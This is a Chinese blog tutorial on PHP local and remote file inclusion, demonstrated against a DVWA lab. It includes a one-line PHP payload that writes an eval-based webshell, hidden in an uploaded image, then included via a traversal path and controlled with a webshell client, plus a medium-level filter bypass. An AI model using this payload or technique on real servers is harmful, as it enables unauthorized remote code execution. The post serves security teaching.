文件包含渗透

最新推荐文章于 2022-10-22 02:44:07 发布
最新推荐文章于 2022-10-22 02:44:07 发布
阅读量993 收藏 4
点赞数 1
分类专栏: 网络安全 文章标签: 文件包含渗透 LFI RFI
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heibaikong6/article/details/100081546
版权

简介

在这里插入图片描述

  • 原理及其危害
    文件包含漏洞:即file inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_foen选项(选项开启之后,服务器允许包含一个远程的文件)。服务器通过php的特性(函数)去包含任意文件时由于要包含的文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到自己目的。
  1. 文件包含(file inclusion)即程序通过(包括函数)条用本地或远程文件,从此来实现拓展功能
  2. 被包含的文件可以是各种文件格式,而当文件里面包含恶意代码,则会形成远程命令执行或文件上传漏洞
  3. 文件包含漏洞主要发生在有包含语句的环境中,例如PHP所具备include、require等包含函数

文件包含分为两类:

  • 本地文件包含LFI(local File Inclusion)当被包含的文件在服务器本地时就形成本地文件包含
  • 远程文件包含RFI(Remote File Inclusion)当被包含的文件在第三方服务器时,叫做远程文件包含
vim /etc/php5/cli/php.ini

owasp 低级别(low)默认开启着allow_url_include
在这里插入图片描述

本地文件包含
在这里插入图片描述
在这里插入图片描述

  • Robots协议(也称为爬虫协议、机器人协议等)的全称是“网络爬虫排除标准”(Robots Exclusion Protocol),网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。Robots协议的本质是网站和搜索引擎爬虫的沟通方式,用来指导搜索引擎更好地抓取网站内容,而不是作为搜索引擎之间互相限制和不正当竞争的工具。

本地文件包含LFI

一句话图片木马

<?fputs(fopen("shell1.php","w"),'<?php @eval($_POST[caidao]);?>')?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传一句话图片木马:
在这里插入图片描述

然后访问
192.168.8.134/dvwa/vulnerabilities/fi/?page=…/…/hackable/uploads/33.jpg
出现下图代表木马成功注入
在这里插入图片描述

然后用菜刀进行连接:
在这里插入图片描述
成功入侵
在这里插入图片描述

远程文件包含RFI

开启kali的apache2服务器
在这里插入图片描述

写入一句话木马:

<?fputs(fopen("shell50.php","w"),'<?php @eval($_POST[caidao]);?>')?>

在这里插入图片描述
本地主机访问:
在这里插入图片描述
主机使用文件包含打开:
在这里插入图片描述
查看服务器已经存在上传的shell50.php文件,并查看文件内容
在这里插入图片描述
用菜刀连接shell50.php
在这里插入图片描述
访问成功
在这里插入图片描述
将安全级别调整为中级
源码:在这里插入图片描述

  1. 对本地文件包含漏洞没有影响
  2. 对一句话图片木马也没有影响
    创建shell500.txt文件
    在这里插入图片描述
    文件包含打开
    在这里插入图片描述
    发现服务器并未生成shell500.php文件
    在这里插入图片描述
  • 如何破解?
    将远程连接名进行隐藏
    肉鸡重新访问
    在这里插入图片描述
    在这里插入图片描述
    执行文件包含后查看服务器,包含shell500.php
    在这里插入图片描述

设置为高安全级别
源码:
在这里插入图片描述
硬匹配,很安全,但是对于开发人员很麻烦。

heibaikong6
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
文件包含漏洞渗透与攻防(一)
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-01 640
随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过就造成了文件包含漏洞。文件包含漏洞也叫“任意文件访问漏洞”,会造成服务端敏感文件被访问。
渗透测试-文件包含漏洞
lza20001103的博客
04-27 1611
文件包含漏洞
2019年度全国职业技能大赛中职组“网络空间安全”赛项
PushSafe
04-04 1699
2019年度全国职业技能大赛中职组“网络空间安全”赛项 青岛市竞赛任务书 一、竞赛时间 8:30-11:30,共计3小时。 二、竞赛阶段 竞赛阶段 任务阶段 竞赛任务 竞赛时间 分值 第一阶段 单兵模式系统渗透测试 任务一 Windows渗透测试 100分钟 150 任务二 漏洞扫描与利用 150 任务三 简单盲注 200 任务四 文件包含渗透加固 200 备战阶段 攻防对抗准备工作 20分钟 0 第二阶段 分组对抗 系统加固:15分钟 60分钟 300 渗透测试:45分钟 三、竞赛任务书内容
网络安全——文件包含漏洞渗透及防御
qq_39103818的博客
03-14 576
概述 文件包含漏洞渗透是指通过不严谨的php网页后台而产生的安全漏洞。 比如: 有三个正常的文件需要在主代码中运行,把这三个好的文分别为 a.php b.php c.php 主代码可以用三种办法将这几个文件包含进来: 第一种: include a.php include b.php include c.php 第二种: include *.php 第三种: include * 显然,如果主代...
网络安全-文件包含漏洞原理、攻击及防御
关注网络安全、云原生安全
08-14 5930
目录 简介 类型 原理 攻击 防御 简介 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 类型 根据不同的配置环境,文件包含漏洞分为如下两种情况:1.本地文件包含漏洞:仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。2.远程文件
pte 文件包含
weixin_51387754的博客
10-13 1061
注册信息安全专业人员-渗透测试,英文为 Certified Information Security Professional - Penetration Test Engineer ,简称 CISP-PTE。证书持有人员主要从事信息安全技术领域网站渗透测试工作,具有规划测试方案、编写项目测试计划、编写测试用例、测试报告的基本知识和能力。
云计算安全文件包含渗透.pdf
01-14
1、文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、修改头像、分享图片/视频等 2、正常的文件一般是文档、图片、视频等,Web应用收集之后放入...实际渗透两种相结合,达到对目标的深度控制
E006-渗透测试常用工具-使用fimap进行文件包含渗透测试漏洞审计.pdf
12-02
渗透测试是一种安全评估方法,通过模拟黑客攻击行为来检测系统中的漏洞。...文件包含漏洞的审计和利用是渗透测试中至关重要的一部分,通过fimap等工具,测试者能够有效地发现和利用这些漏洞,从而提高系统的安全性。
渗透测试技术之本地文件包含
02-01
通过加强对本地文件包含(LFI)渗透测试技术的研究,可以帮助渗透测试人员和学生在未来的渗透测试过程中,识别和测试LFI漏洞。在Web程序渗透测试中,利用本文中的技术发现的LFI漏洞是渗透测试中的典型漏洞。此外,在...
攻防_漏洞_文件包含_文件包含漏洞详解
最新发布
redglare的博客
10-22 4051
文件包含漏洞详解
渗透测试之文件包含漏洞&利用姿势
qq_46217803的博客
07-14 1120
文件包含漏洞的分类 大体可以分为:本地文件包含和远程文件包含。顾名思义,引用本地文件,利用inchude包含函数包含本地(服务器)文件。什么是动态变量? 利用协议读取源代码 截断%00 这里假设漏洞代码为 长度截断 漏洞代码演示 与上面原理差不多,在1.txt中写下实例: php:// 实例 如果具有一定的写入权限,POST 写入一句话木马 ...
文件包含渗透File inclusion 本地文件和远程文件包含+webshell(网络安全学习11)
Until_U的博客
07-04 3770
CONTENTS 1 文件包含渗透简述 1.1 原理和危害 1.2 实验模拟环境 2 低安全级别渗透 2.1 本地文件包含 2.2 本地文件包含+webshell 2.3 远程文件包含+webshell 3 中安全级别渗透 3.1 本地文件包含 3.2 本地文件包含+webshell 3.3 远程文件包含+webshell 4 高安全级别渗透 1 文件包含渗透简述 1.1 原理和危害 文件包含漏洞:即File Inclusion,意思是文件包含(漏洞),是指当服务器开启a.
渗透测试-文件包含漏洞以及php伪协议的应用
lza20001103的博客
07-20 3107
渗透测试-文件包含漏洞以及php伪协议的应用
2018 年山东省职业技能大赛 中职组“网络空间安全”赛项竞赛赛题
yuhongkui的专栏
11-28 6913
一、竞赛时间 8:30-11:30,共计 3 小时。 二、竞赛阶段 三、竞赛任务书内容 (一)拓扑图 (二)第一阶段任务书 任务一、 Nmap 扫描渗透测试 任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机场景:Kali 渗透机用户名:root,密码:toor 提示:使用 nmap 进...
渗透之路基础 -- 文件包含
09-16 500
本地包含漏洞 PHP常见函数 include() <?php $file=$_GET['f']; include($file); ?> 文件包含漏洞原理:利用include的函数执行网站服务器的文件 想要访问test外的 phpinfo.php文件可以这样访问 漏洞产生: 可控变量 $file 使用函数 include 其他函数 include_once,requ...
渗透文件包含漏洞
Jian Sun_的博客
05-16 1371
文件包含漏洞介绍 文件包含故名思意就是文件中包含其他的文件,这也许是开发人员为了减轻开发量从而在代码设计的时候包含了某些文件,更甚者是直接包含了类似*.php、*.*这种文件。首先文件包含这个行为是正常的,因为在开发的途中难免会遇到有重复的代码等需要设计,而通过文件包含就可以减轻一定的工作量,所以文件包含本身是正常的。但是需要注意在文件包含行为中的一些配置,如果是PHP的话,那么在PHP安装目录下的php.ini配置文件中可以对文件包含的一些配置进行相关的设置: php.ini的一些配置信息查看 文件包
文件包含漏洞(绕过姿势)
求天下者,积少成多
06-01 9911
文件包含漏洞是渗透测试过程中用得比较多的一个漏洞,主要用来绕过waf上传木马文件。今日在逛Tools论坛时,发现了一种新型的文件包含姿势,在此记录分享,并附上一些文件包含漏洞的基础利用姿势。特殊姿势利用phar://协议特性可以在渗透过程中帮我们绕过一些waf检测,phar:// 数据流包装器自 PHP 5.3.0 起开始有效,貌似可以绕过安全狗。利用过程新建shell.php代码内容:123<?p

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值